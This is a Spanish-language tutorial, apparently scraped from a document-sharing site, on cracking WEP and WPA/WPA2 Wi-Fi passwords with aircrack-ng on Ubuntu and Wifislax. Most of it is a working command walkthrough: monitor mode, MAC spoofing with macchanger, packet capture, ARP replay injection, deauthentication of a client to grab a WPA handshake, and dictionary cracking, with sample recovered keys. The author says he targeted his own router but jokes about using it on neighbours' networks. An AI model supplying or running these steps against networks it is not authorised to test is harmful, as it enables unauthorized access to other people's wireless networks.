Tutorial de Aircrack
-
Upload
supertikita -
Category
Documents
-
view
21 -
download
0
Transcript of Tutorial de Aircrack
TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.10 y tarjeta SMCWUSB-G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1
ATENCION PREGUNTA:
Siendo jander tanto el nombre de la red a atacar como el de el
archivo de paquetes capturados, y 00:13:F7:1D:B6:CF la MAC del
punto de acceso a atacar, dgase su contrasea WEP y WPA.
Antes de empezar : decir que todo funciona igual de bien en
Wifislax, excepto que la tarjeta de red inalambrica usb SMCWUSB-G
tuve que que quitarla y volverla a conectar una vez que estuve
dentro de Wifislax, sin configuracin, ni necesita drivers ni nada,
simplemente quitarla y volverla a pinchar y ya la reconoce
Wifislax, no hace falta ayuda chipset ni lanzadores ni n. En ubuntu
8.10 no hay que hacer nada, ya reconoce la tarjeta y no hay que
buscar drivers ni kernel ni otras cosas.
Espero que le pueda ayudar a alguien con chipset zydas como a mi me
ayudaron los foros, videos, tutos etc de
www.foro.seguridadwireless.net , http://foro.el-hacker.com ,
http://www.youtube.com/watch?v=whYDVSzvJQ8 (estos tres videos
recomiendo que se vean antes de empezar, sobre todo los que no
tengan ni idea de auditoras y tambin los que les pique el gusanillo
de linux) y ms gracias a tantos otros que no hay espacio xd.
CUATRO CONCEPTOS BASICOS :
PRIMER REQUISITO IMPRESCINDIBLE :
Ver el tutorial de Alfonso Cruz para sacar claves Wep
SEGUNDOS REQUISITOS NO IMPRESCINDIBLES :
Hay que saber, llegados a este punto, conceptos como DATA, ARP,
IVS, y HANDSHAKE, SINO VUELVE A Ver el tutorial de Alfonso Cruz
para sacar claves Wep
Sino. Aqu te los explico yo, como siempre, en cristiano
DATA : son paquetes muy buenos, muy bonitos y muy entraables, de
hecho indican que es una red que puedes auditorizar con posibles
buenos resultados, los veras despues de hacer un airodum-ng.
PARA AUDITORIAS WEP : NECESITAS 120.000 ARP
ARP : es lo que tienes que capturar en un ataque wep, un paquete
muy guai, necesitas de 40000 a 120000.
IVS : son vectores de inicializacion de los paquetes que te sirven
para sacar la clave wep, tambin necesitas 80000 o 120000, y tambin
son para asuntos wep.
PARA AUDITORIAS WPA-WPA2 SLO NECESITAS UN PAQUETE LLAMADO HANDSHAKE
Y NO 120.000 COMO PARA WEP
HANDSHAKE:
Traducido es apreton de manos, o sea el momento en que ordenata y
punto de acceso se vuelven a saludar y se mandan la clave, al
reconocerse como colegas, ese es el momento en que el airodump
captura ese preciado handshake que contiene laclave, buff mi
espalda, me duele de tanto escribir xd, este preciado handshake es
fundamental para el ataque wpa-wpa2, porque es el que guarda la
clave wpa-wpa2, despues, simplemente hay que compararlo con el
diccionario y voil.
DICCIONARIO(WORDLIST) :
La pena de todo esto, infelices que habeis ledo hasta aqu, es que
una clave wpa-wpa2 no se puede capturar a no ser que sea del tipo
manolin233 o tobi8876, o que tengas un diccionario acojonante, y de
esos, desafortunadamente todava no existen, si sabeis de alguno me
lo mandais a [email protected]
Ahora en serio, y ltimo consejo:
El diccionario deber estar guardado en la carpeta donde estas
haciendo todo: En Wifislax es: / root
En Ubuntu la del usuario, pero vale cualquiera mientras sepas donde
tienes el diccionario, lo mejor para los novatos es tener el
diccionario en la misma carpeta dnde haces todo).
LO DEL ATAQUE WPA-WPA2 CON CLIENTE :
Vamos a ver, que como intentes atacar el router de un amigo, que en
ese momento no tenga conectado un pc a su router y con la mula
puesta, pues eso, que lo llevas claro, te llevara siglos, o toda tu
paciencia, la cual es mejor dedicar a tratar mejor a tu vecino y
pedirle la clave, para que amablemente la comparta contigo y llegar
juntos a pagar menos a TIMOFONICA xd.
INDICE DE COMANDOS USADOS(por orden de aparicin y uso):
Comandos para WEP:
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
iwconfig
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
pulsar control-c para parar airodump
airodump-ng mon0 -w jander -c 6
aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h
00:11:22:33:44:55 mon0
aireplay-ng -3 -b 00:13:F7:1D:B6:CF -h 00:11:22:33:44:55 mon0
aircrack-ng jander*.cap
Comandos para WPA :
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
iwconfig
airodump-ng -c 6 --bssid 00:13:f7:1d:b6:cf -w jander mon0
aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50
mon0
aircrack-ng -w dictionary_spanish.dic -0 jander*.cap
Nota : el ataque se realiz sobre mi router Smcwbr-14-g, con la mula
conectada desde el cliente en el caso Wpa, con un diccionario,
capturando el handshake en 5 minutos.
En el caso de la clave WEP, se hizo falseando la MAC con
macchanger, tambien con trfico, y en unos dos minutos empez a
inyectar como loco, en 10 minutos tena 200000 arps xd.
SACANDO CLAVE WEP
1er PASO : Configurar la tarjeta en modo monitor: AIRMON
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng start mon0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0 (como explica Alfonso Cruz en
sus tres magistrales videos que recomiendo ver antes de empezar a
meter comandos en la consola
http://www.youtube.com/watch?v=whYDVSzvJQ8 ).
ifconfig mon0 up
2 PASO: Capturar paquetes: AIRODUMP
airodump-ng mon0 (localizas la red y apunta su mac y su
canal)
control-c(Para parar el airodump)
airodump-ng mon0 -w jander -c 6 (lo dejas capturando)
3er PASO: Autentificarse : AIREPLAY, en otra consola
aireplay-ng -1 0 -e jander -a 00:13:F7:1D:B6:CF -h
00:11:22:33:44:55 mon0
si la autentificacion es correcta, debe decir sucessful :) pasas al
siguiente paso.
4 PASO : Inyectar paquetes: AIREPLAY
aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0 y
cuando llegues a 120000 arps:
5 PASO: Buscar clave en el archivo de captura jander.cap :
AIRCRACK
aircrack-ng jander*.cap
KEY FOUND! [ 5A:30:30:30:32:43:46:42:37:35:41:38:32 ] (ASCII:
Z0002CFB75A82 )
FIN
SACANDO CLAVE WAP-WAP2
1er Paso : Configurar la tarjeta :AIRMON
ifconfig
iwconfig
ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng start mon0
2 Paso : Capturar paquetes: AIRODUMP
airodump-ng mon0
cuando veas tu punto de acceso a atacar, control-c y en otra
consola :
airodump-ng -c 6 --bssid 00:13:F7:1D:B6:CF -w jander mon0
3er Paso: Deautentificar : AIREPLAY en otra consola
aireplay-ng -0 30 -a 00:13:F7:1D:B6:CF -c 00:21:5d:35:02:50
mon0
Despus de usar este comando, fijaros de vez en cuando en la
pantalla del airodump, ARRIBA A LA DERECHA, y ah debe aparecer el
preciado handshake y a continuacin, el 4 paso.
4 Paso : Buscar la clave en el Dicionario :AIRCRACK,en otra
consola
aircrack-ng -w dictionary_spanish.dic -o jander*.cap
KEY FOUND! [ CF:CF:CF:CF:CF ]
FIN